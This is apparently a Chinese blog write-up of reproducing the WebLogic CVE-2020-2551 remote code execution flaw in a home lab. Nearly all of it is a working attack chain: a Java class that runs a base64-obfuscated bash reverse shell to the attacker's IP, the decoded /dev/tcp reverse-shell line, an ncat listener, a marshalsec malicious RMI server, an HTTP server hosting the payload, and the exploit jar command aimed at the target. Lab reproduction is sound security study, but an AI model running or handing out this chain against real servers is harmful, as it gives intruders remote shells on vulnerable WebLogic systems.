手动搭建的weblogic漏洞环境,参考文章:https://blog.csdn.net/qq_41617034/article/details/118799208
一开始使用Ubuntu的NAT环境,但是没有成功,最后按照网上的说法应该是NAT模式不大行,然后使用的是桥接模式了
Ubuntu-IP:172.16.1.168
物理机-IP(攻击机):172.16.1.129
使用到的工具
1.exp.java文件
1
2
3
4
5
6
7
8
9
10
11
12
13
| import java.io.IOException;
public class exp {
static{
try {
java.lang.Runtime.getRuntime().exec("bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4xNi4xLjEyOS8zMzMzIDA+JjE=}|{base64,-d}|{bash,-i}");
} catch (IOException e) {
e.printStackTrace();
}
}
public static void main(String[] args) {
}
}
|
2.marshalsec-0.0.3-SNAPSHOT-all.jar
3.weblogic_CVE_2020_2551.jar
使用到的命令
1
2
3
4
5
6
| ncat -lvnp 3333
javac exp.java -source 1.6 -target 1.6
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://172.16.1.129:8082/#exp" 1099
python3 -m http.server 8082
java -jar weblogic_CVE_2020_2551.jar 172.16.1.168 7001 rmi://172.16.1.129:1099/exp
/bin/bash -i >& /dev/tcp/172.16.1.129/3333 0>&1
|
具体步骤
1.攻击机开启nc
2.编译exp.java文件,生成.class文件
1
| javac exp.java -source 1.6 -target 1.6
|
3.在有exp.class文件夹下启一个web服务
1
| python3 -m http.server 8082
|
4.使用marshalsec起一个恶意的RMI服务
1
| java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://172.16.1.129:8082/#exp" 1099
|
5.使用POC攻击,反弹shell
1
| java -jar weblogic_CVE_2020_2551.jar 172.16.1.168 7001 rmi://172.16.1.129:1099/exp
|
最后的反弹shell,POC攻击的返回结果依然是“没有回显 自行检测”,但是反弹成功
